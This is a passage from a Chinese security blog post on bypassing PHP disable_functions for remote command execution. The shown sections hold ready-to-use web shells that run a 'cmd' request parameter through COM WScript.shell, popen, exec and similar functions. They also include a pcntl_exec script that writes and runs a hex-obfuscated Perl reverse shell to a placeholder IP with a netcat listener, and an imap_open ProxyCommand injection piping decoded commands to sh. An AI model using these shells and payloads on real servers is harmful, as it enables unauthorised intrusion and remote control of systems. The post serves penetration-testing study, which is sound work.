<h3 id="使用windows-系统组件com"><a href="#使用windows-系统组件com" class="headerlink" title="使用windows 系统组件com"></a>使用windows 系统组件com</h3><p>(1)phpinfo 中 com.allow_dcom 开启<br>什么是com 组件:<br>COM组件是以WIN32动态链接库（DLL）或可执行文件（EXE）形式发布的可执行代码组成。 –百度百科</p>
<p>comshell.php :</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$command = $_GET[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line">$wsh = <span class="keyword">new</span> COM(<span class="string">&#x27;WScript.shell&#x27;</span>); <span class="comment">// 生成一个COM对象　Shell.Application也能</span></span><br><span class="line">$exec = $wsh-&gt;exec(<span class="string">&quot;cmd /c&quot;</span>.$command); <span class="comment">//调用对象方法来执行命令</span></span><br><span class="line">$stdout = $exec-&gt;StdOut();</span><br><span class="line">$stroutput = $stdout-&gt;ReadAll();</span><br><span class="line"><span class="keyword">echo</span> $stroutput;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h3 id="使用遗漏函数"><a href="#使用遗漏函数" class="headerlink" title="使用遗漏函数"></a>使用遗漏函数</h3><p>直接利用遗漏函数 exec , shell _exec ,system ,passthru ,popen ,proc_open,pcntl_exec,imap_open.dl 来执行命令 :<br>(1) exec</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> exec(<span class="string">&#x27;whoami&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>(2) shell_exec</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo shell_exec(&#39;whoami&#39;);?&gt;</span><br></pre></td></tr></table></figure>
<p>(3) system</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">system(&#39;whoami&#39;);?&gt;</span><br></pre></td></tr></table></figure>
<p>(4) passthru</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">passthru(&quot;whoami&quot;);?&gt;</span><br></pre></td></tr></table></figure>

<p>(5) popen</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php$command&#x3D;$_POST[&#39;cmd&#39;];</span><br><span class="line">$handle &#x3D; popen($command , &quot;r&quot;);</span><br><span class="line">while(!feof($handle))</span><br><span class="line">&#123;        echo fread($handle, 1024);  &#x2F;&#x2F;fread($handle, 1024);</span><br><span class="line">&#125;</span><br><span class="line">pclose($handle);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>(6) proc_open</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$command&#x3D;&quot;ipconfig&quot;;</span><br><span class="line">$descriptorspec &#x3D; array(1 &#x3D;&gt; array(&quot;pipe&quot;, &quot;w&quot;));</span><br><span class="line">$handle &#x3D; proc_open($command ,$descriptorspec , $pipes);</span><br><span class="line">while(!feof($pipes[1]))</span><br><span class="line">&#123;        echo fread($pipes[1], 1024); &#x2F;&#x2F;fgets($pipes[1],1024);</span><br><span class="line">&#125;?&gt;</span><br></pre></td></tr></table></figure>
<p>(7) pcntl_exec:<br>条件: 开启了pcntl 扩展，并且php 4&gt;=4.2.0 , php5 onlinux</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">&#x2F;*******************************</span><br><span class="line"> *查看phpinfo编译参数--enable-pcntl</span><br><span class="line"> *作者 Spider</span><br><span class="line"> *nc -vvlp 443</span><br><span class="line">********************************&#x2F;</span><br><span class="line"> </span><br><span class="line">$ip &#x3D; &#39;xxx.xxx.xxx.xxx&#39;;</span><br><span class="line">$port &#x3D; &#39;443&#39;;</span><br><span class="line">$file &#x3D; &#39;&#x2F;tmp&#x2F;bc.pl&#39;;</span><br><span class="line"> </span><br><span class="line">header(&quot;content-Type: text&#x2F;html; charset&#x3D;gb2312&quot;);</span><br><span class="line"> </span><br><span class="line">if(function_exists(&#39;pcntl_exec&#39;)) &#123;</span><br><span class="line">        $data &#x3D; &quot;\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x20\x2d\x77\x0d\x0a\x23\x0d\x0a&quot;.</span><br><span class="line">                &quot;\x0d\x0a\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74\x3b\x20\x20\x20\x20\x0d\x0a\x75\x73\x65\x20&quot;.</span><br><span class="line">                &quot;\x53\x6f\x63\x6b\x65\x74\x3b\x0d\x0a\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65&quot;.</span><br><span class="line">                &quot;\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x20\x3d\x20\x27&quot;.$ip.</span><br><span class="line">                &quot;\x27\x3b\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x20\x3d\x20\x27&quot;.$port.</span><br><span class="line">                &quot;\x27\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72&quot;.</span><br><span class="line">                &quot;\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22\x74\x63\x70\x22\x29\x3b\x0d\x0a\x6d\x79\x20\x24&quot;.</span><br><span class="line">                &quot;\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e&quot;.</span><br><span class="line">                &quot;\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x2c\x20\x69\x6e\x65\x74\x5f\x61\x74\x6f&quot;.</span><br><span class="line">                &quot;\x6e\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x29\x29\x3b\x0d\x0a\x6d\x79\x20\x24\x73\x68&quot;.</span><br><span class="line">                &quot;\x65\x6c\x6c\x20\x3d\x20\x27\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x27\x3b\x0d\x0a\x73\x6f&quot;.</span><br><span class="line">                &quot;\x63\x6b\x65\x74\x28\x53\x4f\x43\x4b\x2c\x20\x41\x46\x5f\x49\x4e\x45\x54\x2c\x20\x53\x4f\x43&quot;.</span><br><span class="line">                &quot;\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x20\x24\x70\x72\x6f\x74\x6f\x29\x3b\x0d\x0a\x53\x54\x44&quot;.</span><br><span class="line">                &quot;\x4f\x55\x54\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x53\x4f\x43&quot;.</span><br><span class="line">                &quot;\x4b\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x63\x6f\x6e\x6e\x65&quot;.</span><br><span class="line">                &quot;\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20&quot;.</span><br><span class="line">                &quot;\x64\x69\x65\x20\x22\x63\x61\x6e\x20\x6e\x6f\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x3a\x24\x21&quot;.</span><br><span class="line">                &quot;\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x49\x4e\x2c\x20\x22\x3c\x26\x53\x4f\x43\x4b&quot;.</span><br><span class="line">                &quot;\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x4f\x55\x54\x2c\x20\x22\x3e\x26\x53\x4f\x43&quot;.</span><br><span class="line">                &quot;\x4b\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x45\x52\x52\x2c\x20\x22\x3e\x26\x53\x4f&quot;.</span><br><span class="line">                &quot;\x43\x4b\x22\x3b\x0d\x0a\x73\x79\x73\x74\x65\x6d\x28\x24\x73\x68\x65\x6c\x6c\x29\x3b\x0d\x0a&quot;.</span><br><span class="line">                &quot;\x63\x6c\x6f\x73\x65\x20\x53\x4f\x43\x4b\x3b\x0d\x0a\x65\x78\x69\x74\x20\x30\x3b\x0a&quot;;</span><br><span class="line">        $fp &#x3D; fopen($file,&#39;w&#39;);</span><br><span class="line">        $key &#x3D; fputs($fp,$data);</span><br><span class="line">        fclose($fp);</span><br><span class="line">        if(!$key) exit(&#39;写入&#39;.$file.&#39;失败&#39;);</span><br><span class="line">        chmod($file,0777);</span><br><span class="line">        pcntl_exec($file);</span><br><span class="line">        unlink($file);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">        echo &#39;不支持pcntl扩展&#39;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>(8) imap_open() 函数:<br><img src="https://img-blog.csdnimg.cn/20200814110800444.png#pic_center" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (!function_exists(<span class="string">&#x27;imap_open&#x27;</span>)) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no imap_open function!&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">$server = <span class="string">&quot;x -oProxyCommand=echo\t&quot;</span> . base64_encode($_GET[<span class="string">&#x27;cmd&#x27;</span>] . <span class="string">&quot;&gt;/tmp/cmd_result&quot;</span>) . <span class="string">&quot;|base64\t-d|sh&#125;&quot;</span>;</span><br><span class="line"><span class="comment">//$server = &#x27;x -oProxyCommand=echo$IFS$()&#x27; . base64_encode($_GET[&#x27;cmd&#x27;] . &quot;&gt;/tmp/cmd_result&quot;) . &#x27;|base64$IFS$()-d|sh&#125;&#x27;;</span></span><br><span class="line">imap_open(<span class="string">&#x27;&#123;&#x27;</span> . $server . <span class="string">&#x27;:143/imap&#125;INBOX&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span>); <span class="comment">// or var_dump(&quot;\n\nError: &quot;.imap_last_error());</span></span><br><span class="line">sleep(<span class="number">5</span>);</span><br><span class="line"><span class="keyword">echo</span> file_get_contents(<span class="string">&quot;/tmp/cmd_result&quot;</span>);</span><br></pre></td></tr></table></figure>

            </div>
            
                <div class="kratos-copyright text-center clearfix">
                    <h5>本作品采用 <a rel="license nofollow" target="_blank" href="http://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
                </div>
            
            <footer class="kratos-entry-footer clearfix">
                
                    <div class="post-like-donate text-center clearfix" id="post-like-donate">
                    
                        <a class="donate" href="javascript:;"><i class="fa fa-bitcoin"></i> 打赏</a>
                    
                    
                        <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                        <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://wumingzhilian.github.to/2020/08/19/RCE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://wumingzhilian.github.to/2020/08/19/RCE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/";
            const title         = "「RCE命令执行/代码执行」";
            const excerpt       = `rceRCE英文全称：remote command/code execute分为远程命令执行ping和远程代码执行evel。漏洞出现的原因：没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
disab...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                    
                    </div>
                
                <div class="footer-tag clearfix">
                    <div class="pull-left">
                    <i class="fa fa-tags"></i>
                        <a class="tag-none-link" href="/tags/RCE/" rel="tag">RCE</a>, <a class="tag-none-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
                    </div>
                    <div class="pull-date">
                    <span>最后编辑：2020-08-19</span>
                    </div>
                </div>
            </footer>
        </div>
        
            <nav class="navigation post-navigation clearfix" role="navigation">
                
                <div class="nav-previous clearfix">
                    <a title=" 攻防世界web进阶区upload详解" href="/2020/08/13/攻防世界web进阶区upload详解/">&lt; 上一篇</a>
                </div>
                
                
                <div class="nav-next clearfix">
                    <a title=" burpsuit下Engagement tools 使用学习" href="/2020/08/19/burpsuit下Engagement-tools-使用学习/">下一篇 &gt;</a>
                </div>
                
            </nav>
        
        
            <div id="disqus_thread"></div>
<script>
    $(function(){
        window.DISQUS = null;
        new DisqusJS({
            shortname: '',
            siteName: '',
            identifier: '2020/08/19/RCE命令执行-代码执行/',
            url: 'http://wumingzhilian.github.to/2020/08/19/RCE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/',
            api: '',
            apikey: '',
            admin: '',
            adminLabel: ''
        });
    });
</script>
<noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://github.com/SukkaW/DisqusJS">comments powered by DisqusJS.</a></noscript>
        
    </article>
</section>
</div>
        
            <section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
                
                    <aside id="krw-about" class="widget widget-kratos-about clearfix">
    
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.png" />
        </div>
    </div>
    <div class="textwidget">
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#rce"><span class="toc-number">1.</span> <span class="toc-text">rce</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#disable-function"><span class="toc-number">1.1.</span> <span class="toc-text">disable_function</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87disable-function"><span class="toc-number">1.2.</span> <span class="toc-text">绕过disable_function</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-%E7%B3%BB%E7%BB%9F%E7%BB%84%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.1.</span> <span class="toc-text">一.系统组件绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E5%88%A9%E7%94%A8ImageMagick%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87disable-function"><span class="toc-number">1.2.2.</span> <span class="toc-text">二.利用ImageMagick漏洞绕过disable_function</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-%E5%88%A9%E7%94%A8%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8FLD-PRELOAD%E6%9D%A5%E7%BB%95%E8%BF%87php-disable-function%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">1.2.3.</span> <span class="toc-text">三.利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B-%E5%88%A9%E7%94%A8pcntl-exec%E7%AA%81%E7%A0%B4disable-functions"><span class="toc-number">1.2.4.</span> <span class="toc-text">四.利用pcntl_exec突破disable_functions</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php7-%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.5.</span> <span class="toc-text">php7 的绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8apache%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.6.</span> <span class="toc-text">利用apache绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8windows-%E7%B3%BB%E7%BB%9F%E7%BB%84%E4%BB%B6com"><span class="toc-number">1.2.7.</span> <span class="toc-text">使用windows 系统组件com</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E9%81%97%E6%BC%8F%E5%87%BD%E6%95%B0"><span class="toc-number">1.2.8.</span> <span class="toc-text">使用遗漏函数</span></a></li></ol></li></ol></li></ol>
        
    </div>
</aside>
                
                    <!-- Moved to about.ejs -->
                
                    
  <aside id="krw-categories" class="widget widget-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">17</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Sqli-labs/">Sqli-labs</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Sql%E6%B3%A8%E5%85%A5/">Sql注入</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/XSS-Labs/">XSS-Labs</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/sql%E6%B3%A8%E5%85%A5/">sql注入</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><span class="category-list-count">4</span></li></ul>
  </aside>


                
                    
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/CTF/" style="font-size: 0.65em;">CTF</a> <a href="/tags/RCE/" style="font-size: 0.6em;">RCE</a> <a href="/tags/Sqli-labs/" style="font-size: 0.6em;">Sqli-labs</a> <a href="/tags/Sql%E6%B3%A8%E5%85%A5/" style="font-size: 0.6em;">Sql注入</a> <a href="/tags/WEB/" style="font-size: 0.6em;">WEB</a> <a href="/tags/XSS-Labs/" style="font-size: 0.6em;">XSS-Labs</a> <a href="/tags/burpsuit/" style="font-size: 0.6em;">burpsuit</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 0.6em;">sql注入</a> <a href="/tags/web%E8%BF%9B%E9%98%B6%E5%8C%BA/" style="font-size: 0.75em;">web进阶区</a> <a href="/tags/%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81/" style="font-size: 0.6em;">万能密码</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" style="font-size: 0.6em;">信息搜集</a> <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE/" style="font-size: 0.6em;">区块链</a> <a href="/tags/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/" style="font-size: 0.8em;">攻防世界</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 0.7em;">渗透测试</a>
      </div>
  </aside>

                
                    
  <aside id="krw-posts" class="widget widget-kratos-poststab">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
          <a class="list-group-item" href="/2020/10/18/Sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93%E5%AD%A6%E4%B9%A0/"><i class="fa  fa-book"></i> Sql注入总结学习</a>
        
          <a class="list-group-item" href="/2020/10/18/Sqli-labs-%E5%A4%A7%E5%AE%8C%E7%BB%93/"><i class="fa  fa-book"></i> Sqli-labs 大完结</a>
        
          <a class="list-group-item" href="/2020/09/05/0ctf-2016-Web-unserialize/"><i class="fa  fa-book"></i> wuming/unserialize</a>
        
          <a class="list-group-item" href="/2020/08/20/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6%E5%8C%BAWeb-python-block-chain%E8%AF%A6%E8%A7%A3/"><i class="fa  fa-book"></i> 攻防世界web进阶区Web_python_block_chain详解</a>
        
          <a class="list-group-item" href="/2020/08/19/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6%E5%8C%BAwtf-sh-150%E8%AF%A6%E8%A7%A3/"><i class="fa  fa-book"></i> 攻防世界web进阶区wtf.sh-150详解</a>
        
      </ul>
  </div>
  </aside>

                
            </section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer">
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/wumingzhilian"><i class="fa fa-telegram"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://twitter.com/wumingzhilian"><i class="fa fa-twitter"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://github.com/wumingzhilian"><i class="fa fa-github"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="/atom.xml"><i class="fa fa-rss"></i></a></li>
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2020 wuming 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Made with <i class="fa fa-heart throb" style="color:#d43f57"></i> by <a href="https://candinya.com" target="_blank" rel="nofollow">Candinya</a>.</li>
                        </div>
                        <div>
                            <li>Hosted by <a href="https://github.io" target="_blank">Github Pages</a></li>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                        </div>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</footer>
</div>
</div>
<script defer src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.js"></script>
<script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>

<script async src="/js/candy.min.js"></script>

    <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
    <div id="aplayer"></div>
<script>
$.ajax({
    type:"get",
    url:"",
    dataType:"json",
    success: function(data){
        new APlayer({
            container: document.getElementById('aplayer'),
            fixed: true,
            order: 'random',
            lrcType: 3,
            audio: data
        });
    }
});
</script>


    <script defer src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>

    <script defer src="/js/kr-dark.min.js"></script>



</body>
</html>